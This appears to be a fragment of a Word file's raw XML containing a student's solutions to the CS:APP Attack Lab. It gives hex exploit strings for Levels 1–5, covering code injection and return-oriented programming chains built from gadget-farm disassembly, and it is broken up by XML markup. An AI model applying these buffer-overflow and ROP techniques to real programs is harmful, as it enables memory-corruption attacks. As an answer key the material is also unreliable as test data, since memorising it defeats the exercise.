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Level_1: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5c 17 40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Level_2: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462280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0000000000000000 &lt;.text&gt;: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0:   48 c7 c7 60 bd 27 14    mov    $0x1427bd60,%rdi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7:   68 88 17 40 00          pushq  $0x401788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c:   c3                      retq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48 c7 c7 60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bd 27 14 68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88 17 40 00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c3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e8 1B 64 55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Level_3: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Disassembly of section .text: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0000000000000000 &lt;.text&gt;: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0:   48 c7 c7 28 1c 64 55    mov    $0x55641c28,%rdi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7:   68 5c 18 40 00          pushq  $0x40185c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c:   c3                      retq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48 c7 c7 28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1c 64 55 68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5c 18 40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c3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00 00 00 00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00 00 00 00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e8 1b 64 55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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>31 34 32 37 62 64 36 30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00 00 00 00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477510" cy="3435350"/>
            <wp:effectExtent l="0" t="0" r="889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Level_4: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eb 18 40 00 00 00 00 00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//pop rax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60 bd 27 14 00 00 00 00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f8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1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40 00 00 00 00 00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//mov rax rdi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88 17 40 00 00 00 00 00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4010025" cy="3119755"/>
            <wp:effectExtent l="0" t="0" r="31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Level_5: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  %rsp,%rax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  %rax,%rdi   #先将栈顶%rsp存入%rdi内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popq  %rax         #将偏移量赋值给%eax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movl  %eax,%edx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movl  %edx,%ecx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movl  %ecx,%esi   #%esi = 偏移量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lea   (%rdi,%rsi,1),%rax #%rax = %rsp + 偏移量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mov   %rax,%rdi    #%rdi = cookie字符地址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touch3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cookie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56 19 40 00 00 00 00 00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f8 18 40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eb 18 40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48 00 00 00 00 00 00 00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5d 19 40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4f 19 40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78 19 40 00 00 00 00 00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26 19 40 00 00 00 00 00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f8 18 40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5c 18 40 00 00 00 00 00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31 34 32 37 62 64 36 30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00 00 00 00 00 00 00 00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4259580" cy="4101465"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635"/>
            <wp:docPr id="3" name="图片 3" descr="4Y`%24_$FVND25I87`BW7`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Y`%24_$FVND25I87`BW7`J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00000000004018e4 &lt;start_farm&gt;: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4018e4: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b8 01 00 00 00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    $0x1,%eax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4018e9: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00000000004018ea &lt;getval_221&gt;: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4018ea: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b8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>58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90 90 90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    $0x90909058,%eax    //pop rax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4018ef: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00000000004018f0 &lt;addval_438&gt;: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4018f0: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8d 87 a8 58 90 90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-0x6f6fa758(%rdi),%eax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4018f6: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00000000004018f7 &lt;getval_244&gt;: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4018f7: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b8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>48 8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9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c7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90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    $0x90c78948,%eax      // mov rax rdi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4018fc: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00000000004018fd &lt;addval_403&gt;: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4018fd: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8d 87 db 58 91 90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-0x6f6ea725(%rdi),%eax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401903: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0000000000401904 &lt;setval_400&gt;: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401904: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7b 50 90 90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$0x9090507b,(%rdi)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40190a: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000000000040190b &lt;addval_461&gt;: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40190b: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8d 87 48 89 c7 90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-0x6f3876b8(%rdi),%eax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401911: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0000000000401912 &lt;setval_379&gt;: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401912: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48 89 c7 c1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$0xc1c78948,(%rdi)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401918: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0000000000401919 &lt;addval_349&gt;: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401919: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8d 87 48 89 c7 91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-0x6e3876b8(%rdi),%eax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40191f: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0000000000401920 &lt;mid_farm&gt;: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401920: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b8 01 00 00 00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    $0x1,%eax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401925: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0000000000401926 &lt;add_xy&gt;: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401926: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48 8d 04 37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(%rdi,%rsi,1),%rax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40192a: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000000000040192b &lt;setval_216&gt;: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40192b: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a9 ce 84 c0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$0xc084cea9,(%rdi)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401931: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0000000000401932 &lt;getval_155&gt;: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401932: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b8 88 ce 08 db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    $0xdb08ce88,%eax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401937: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0000000000401938 &lt;addval_267&gt;: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401938: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8d 87 4a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89 e0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90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-0x6f1f76b6(%rdi),%eax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40193e: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>000000000040193f &lt;setval_222&gt;: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  40193f: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c7 07 89 c2 60 db    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movl   $0xdb60c289,(%rdi)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  401945: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retq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0000000000401946 &lt;setval_376&gt;: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401946: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c7 07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48 89 e0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92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movl   $0x92e08948,(%rdi)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40194c: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>000000000040194d &lt;addval_414&gt;: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 xml:space="preserve">  40194d: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>8d 87</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 89 d1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 xml:space="preserve"> 90 90    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>lea    -0x6f6f2e77(%rdi),%eax  //mov edx ecx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 xml:space="preserve">  401953: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>c3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0000000000401954 &lt;setval_341&gt;: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401954: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48 89 e0 c3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$0xc3e08948,(%rdi)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40195a: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FF0000"/>
          <w:sz w:val="19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FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>000000000040195b &lt;setval_319&gt;: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FF0000"/>
          <w:sz w:val="19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FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  40195b:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">c7 07 89 c2 c3 ff    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>movl   $0xffc3c289,(%rdi)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19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FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  401961:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">c3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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>0000000000401962 &lt;setval_488&gt;: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  401962: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c7 07 89 c2 94 c9    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movl   $0xc994c289,(%rdi)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  401968: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c3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0000000000401969 &lt;addval_312&gt;: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401969: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8d 87 89 d1 a4 db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-0x245b2e77(%rdi),%eax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40196f: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0000000000401970 &lt;setval_460&gt;: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401970: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99 d1 38 db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$0xdb38d199,(%rdi)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401976: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>0000000000401977 &lt;getval_179&gt;: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 xml:space="preserve">  401977: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 xml:space="preserve">b8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>89 ce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 xml:space="preserve"> 84 db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    $0xdb84ce89,%eax   //mov ecx esi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40197c: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000000000040197d &lt;setval_492&gt;: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40197d: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89 d1 a4 c9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$0xc9a4d189,(%rdi)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401983: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0000000000401984 &lt;addval_211&gt;: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401984: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8d 87 89 ce 20 c9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-0x36df3177(%rdi),%eax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40198a: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000000000040198b &lt;getval_471&gt;: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40198b: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b8 2e 8d ce c3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    $0xc3ce8d2e,%eax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401990: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0000000000401991 &lt;getval_478&gt;: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401991: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b8 89 d1 94 db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    $0xdb94d189,%eax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401996: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0000000000401997 &lt;setval_102&gt;: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401997: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09 d1 84 c0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$0xc084d109,(%rdi)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40199d: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000000000040199e &lt;addval_157&gt;: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40199e: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8d 87 48 81 e0 90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-0x6f1f7eb8(%rdi),%eax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4019a4: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00000000004019a5 &lt;setval_263&gt;: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4019a5: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89 d1 20 c0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$0xc020d189,(%rdi)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4019ab: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00000000004019ac &lt;addval_275&gt;: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4019ac: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8d 87 48 89 e0 c2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-0x3d1f76b8(%rdi),%eax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4019b2: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00000000004019b3 &lt;addval_495&gt;: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4019b3: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8d 87 8b ce 20 c9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-0x36df3175(%rdi),%eax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4019b9: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FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0000000004019ba &lt;setval_226&gt;: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  4019ba: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c7 07 89 c2 08 db    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movl   $0xdb08c289,(%rdi)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  4019c0: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c3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00000000004019c1 &lt;setval_108&gt;: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4019c1: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48 89 e0 c2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$0xc2e08948,(%rdi)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4019c7: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>00000000004019c8 &lt;addval_489&gt;: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  4019c8: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8d 87 89 c2 c4 c9    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>lea    -0x363b3d77(%rdi),%eax</w:t>
      </w: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//mov eax edx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  4019ce:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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c3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00000000004019cf &lt;setval_193&gt;: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4019cf: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61 75 c9 d1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$0xd1c97561,(%rdi)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4019d5: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00000000004019d6 &lt;setval_335&gt;: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4019d6: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7f </w:t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48 89 e0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$0xe089487f,(%rdi)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//mov rsp rax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4019dc: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00000000004019dd &lt;addval_365&gt;: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4019dd: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8d 87</w:t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89 ce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="FF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18 d2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-0x2de73177(%rdi),%eax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4019e3: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00000000004019e4 &lt;addval_455&gt;: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4019e4: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8d 87 a9 c2 c3 6f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0x6fc3c2a9(%rdi),%eax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4019ea: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00000000004019eb &lt;setval_166&gt;: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4019eb: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48 8d e0 90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$0x90e08d48,(%rdi)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4019f1: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00000000004019f2 &lt;getval_371&gt;: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4019f2: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b8 89 ce 60 c0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    $0xc060ce89,%eax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4019f7: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00000000004019f8 &lt;setval_219&gt;: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4019f8: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c7 07 c9 c2 c3 07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movl   $0x7c3c2c9,(%rdi)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4019fe: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00000000004019ff &lt;addval_290&gt;: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4019ff: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8d 87 99 c2 84 db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lea    -0x247b3d67(%rdi),%eax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401a05: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0000000000401a06 &lt;end_farm&gt;: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401a06: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b8 01 00 00 00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    $0x1,%eax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401a0b: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retq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401a0c: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0f 1f 40 00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nopl   0x0(%rax)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2Yzk4OWZlMzY2NzNiMzllYzgyZGU0Y2NlOGI5NmUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="0F103C29"/>
    <w:rsid w:val="14D95F24"/>
    <w:rsid w:val="231D153B"/>
    <w:rsid w:val="366A0F93"/>
    <w:rsid w:val="3F161043"/>
    <w:rsid w:val="43086074"/>
    <w:rsid w:val="483254E2"/>
    <w:rsid w:val="51DA0794"/>
    <w:rsid w:val="54225640"/>
    <w:rsid w:val="56C30000"/>
    <w:rsid w:val="6A7B6306"/>
    <w:rsid w:val="7ED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1190</Words>
  <Characters>5046</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>140</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7726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2022-12-05T02:38:00Z</dcterms:created>
  <dc:creator>安然若素</dc:creator>
  <cp:lastModifiedBy>安然若素</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-15T13:55:09Z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360BD4DFB86D428AB9B64BBE29897EB7</vt:lpwstr>
  </property>
</Properties>
</file>